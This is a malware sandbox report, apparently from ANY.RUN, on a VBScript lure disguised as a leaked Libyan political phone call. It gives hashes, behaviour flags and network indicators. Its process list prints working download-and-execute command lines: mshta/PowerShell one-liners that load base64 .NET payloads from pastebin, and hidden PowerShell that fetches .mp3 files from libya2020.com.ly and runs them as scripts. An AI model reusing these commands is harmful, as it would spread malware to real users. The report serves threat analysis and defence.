analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

مكالمة مسربة بين باشاغا وقيادي.vbs

Full analysis: https://app.any.run/tasks/79879583-cbfc-45f1-971a-e4799e7b0407
Verdict: Malicious activity
Analysis date: November 30, 2020, 06:42:59
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/plain
File info: UTF-8 Unicode text, with very long lines, with CRLF line terminators
MD5:

F11AF900F15215D81245B000809E7BE8

SHA1:

B45D57376A46747A5C24ECAEA76AFBF77F6698CA

SHA256:

79152EFEFD6F3C958CDB4B2FAA6FF2A1F18FAB55EBE28B9873154DEC9BBA37EE

SSDEEP:

384:BxFTJKx/yFybW/piIEVhSB/yFUzEUjWNh8jySBhyAzLyUkEUjILaCSO6kW9ZFTwW:B9Kx/yFybW/piIEVhe/yFUzEUjWNh8jO

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Runs PING.EXE for delay simulation

      • cmd.exe (PID: 2288)
      • cmd.exe (PID: 2500)
      • cmd.exe (PID: 3876)

    • Executes PowerShell scripts

      • mshta.exe (PID: 3548)
      • mshta.exe (PID: 2496)
      • mshta.exe (PID: 2528)

    • Writes to a start menu file

      • WScript.exe (PID: 2652)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 2652)

    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • cmd.exe (PID: 2500)
      • cmd.exe (PID: 3876)
      • cmd.exe (PID: 2288)

    • Creates files in the user directory

      • powershell.exe (PID: 3016)
      • powershell.exe (PID: 1680)
      • powershell.exe (PID: 3724)
      • powershell.exe (PID: 2540)
      • powershell.exe (PID: 3624)
      • WScript.exe (PID: 2652)
      • powershell.exe (PID: 2108)
      • powershell.exe (PID: 2140)
      • powershell.exe (PID: 2796)

    • Executes PowerShell scripts

      • WScript.exe (PID: 2652)

  • INFO

    • Reads internet explorer settings

      • mshta.exe (PID: 2496)
      • mshta.exe (PID: 3548)
      • mshta.exe (PID: 2528)

    • Reads settings of System Certificates

      • powershell.exe (PID: 3016)
      • powershell.exe (PID: 2796)
      • powershell.exe (PID: 2140)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
62
Monitored processes
18
Malicious processes
7
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe cmd.exe no specs ping.exe no specs powershell.exe powershell.exe cmd.exe no specs cmd.exe no specs powershell.exe powershell.exe powershell.exe ping.exe no specs ping.exe no specs mshta.exe no specs powershell.exe mshta.exe no specs mshta.exe no specs powershell.exe powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2652"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\مكالمة مسربة بين باشاغا وقيادي.vbs"C:\Windows\System32\WScript.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
3876"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/rQL02r6C').replace('#$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close)C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1844ping 127.0.0.1 -n 10 C:\Windows\system32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3724"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://libya2020.com.ly/google01.mp3','C:\Users\admin\AppData\Local\Temp\lovefhdfhdf.vbs');Start-Process 'C:\Users\admin\AppData\Local\Temp\lovefhdfhdf.vbs'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1680"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://libya2020.com.ly/TR.mp3','C:\Users\admin\AppData\Local\Temp\nono.vbs');Start-Process 'C:\Users\admin\AppData\Local\Temp\nono.vbs'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2500"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/H2JdYYVV').replace('#$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close)C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2288"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/d46Ekc57').replace('$%f7f81a39-5f63-5b42-9efd-1f13b5431005#39;,'A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close)C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3624"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://libya2020.com.ly/pic.mp3','C:\Users\admin\AppData\Local\Temp\love01.vbs');Start-Process 'C:\Users\admin\AppData\Local\Temp\love01.vbs'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2108"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://libya2020.com.ly/google0rvi.mp3','C:\Users\admin\AppData\Local\Temp\HsUCsYfsgsd5Q1.vbs');Start-Process 'C:\Users\admin\AppData\Local\Temp\HsUCsYfsgsd5Q1.vbs'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2540"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://libya2020.com.ly/ad.mp3','C:\Users\admin\AppData\Local\Temp\ad.vbs');Start-Process 'C:\Users\admin\AppData\Local\Temp\ad.vbs'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 644
Read events
2 146
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
14
Text files
3
Unknown types
0

Dropped files

PID
Process
Filename
Type
1680powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LPE6I5CB5O9AD7UY1ZYZ.temp
MD5:
SHA256:
3724powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\R39WF1XAPJ6NG0QU5KOV.temp
MD5:
SHA256:
3624powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HD287QMLYL8FFXFUSHIE.temp
MD5:
SHA256:
2108powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0A0ABMWFGQT8AYLKH9FQ.temp
MD5:
SHA256:
2540powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\L8ICDS66H6PSKESA40H9.temp
MD5:
SHA256:
3016powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\10UFUBUX3AUPNJT42O5U.temp
MD5:
SHA256:
2140powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OEGLHVOZ5BN27PW0SNZO.temp
MD5:
SHA256:
2796powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\V4YE00AAAMXLJNZ7KEY6.temp
MD5:
SHA256:
3724powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF154456.TMPbinary
MD5:0D6446454B8F30B91D30E67B31109113
SHA256:87AE20D7660542222B0528A9059099218C27B464B8524BAA3DFDEF04EAEE955D
2652WScript.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsgsdgsdgsdg.vbstext
MD5:F11AF900F15215D81245B000809E7BE8
SHA256:79152EFEFD6F3C958CDB4B2FAA6FF2A1F18FAB55EBE28B9873154DEC9BBA37EE
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
8
DNS requests
6
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2540
powershell.exe
GET
403
62.240.36.45:80
http://libya2020.com.ly/ad.mp3
LY
html
380 b
suspicious
2108
powershell.exe
GET
403
62.240.36.45:80
http://libya2020.com.ly/google0rvi.mp3
LY
html
380 b
suspicious
3624
powershell.exe
GET
403
62.240.36.45:80
http://libya2020.com.ly/pic.mp3
LY
html
380 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2140
powershell.exe
104.23.99.190:443
pastebin.com
Cloudflare Inc
US
malicious
2796
powershell.exe
104.23.99.190:443
pastebin.com
Cloudflare Inc
US
malicious
3016
powershell.exe
104.23.99.190:443
pastebin.com
Cloudflare Inc
US
malicious
2108
powershell.exe
62.240.36.45:80
libya2020.com.ly
GPTC Autonomous System, Tripoli Libya
LY
suspicious
1680
powershell.exe
62.240.36.45:80
libya2020.com.ly
GPTC Autonomous System, Tripoli Libya
LY
suspicious
3724
powershell.exe
62.240.36.45:80
libya2020.com.ly
GPTC Autonomous System, Tripoli Libya
LY
suspicious
3624
powershell.exe
62.240.36.45:80
libya2020.com.ly
GPTC Autonomous System, Tripoli Libya
LY
suspicious
2540
powershell.exe
62.240.36.45:80
libya2020.com.ly
GPTC Autonomous System, Tripoli Libya
LY
suspicious

DNS requests

Domain
IP
Reputation
libya2020.com.ly
  • 62.240.36.45
suspicious
pastebin.com
  • 104.23.99.190
  • 104.23.98.190
shared

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
مكالمة مسربة بين باشاغا وقيادي.vbs